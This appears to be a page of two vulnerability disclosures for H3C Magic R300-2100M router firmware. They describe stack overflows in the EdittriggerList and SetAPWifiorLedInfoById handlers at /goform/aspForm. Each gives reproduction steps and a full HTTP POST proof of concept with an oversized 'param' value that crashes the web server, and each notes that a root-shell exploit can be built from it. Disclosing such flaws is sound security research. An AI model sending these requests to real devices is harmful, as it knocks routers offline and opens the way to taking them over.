\# H3C Magic R300-2100M was discovered stack overflow via the EdittriggerList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the EdittriggerList interface at /goform/aspForm. ## Vulnerability Details In function EdittriggerList(sub\_4619F4),the size of local variable v6 is noly 20 bytes long.Parameters in the EdittriggerList interface use the getElement function to split strings(Var). !\[\](https://i.imgur.com/wy2w9tz.png) !\[\](https://i.imgur.com/RNUHEA8.png) The maximum size in the getElement function is limited to 64. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/9e8xgUd.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://i.imgur.com/aF82MZe.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 2034 CMD=EdittriggerList&param=;;;;;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://i.imgur.com/oOVNgxA.png) And you can write your own exp to get the root shell.

CVE-2023-33634: H3C Magic R300-2100M was discovered stack overflow via the EdittriggerList interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/SJacutyr3.png) In the SetAPWifiorLedInfoById function, local variable v12 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/rJSsOFkrn.png) V8 can be controlled by attacker, entered as parameter 'param'. In line 23, v8 is formatted into v12 by function sscanf as long as the size of the data we enter until ';'. So when the size of the data we enter before ';' is larger than 36 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/rJekFFJH3.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 607 CMD=SetAPWifiorLedInfoById&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/S1yZtY1Sn.png) And you can write your own exp to get the root shell.

Tag

#chrome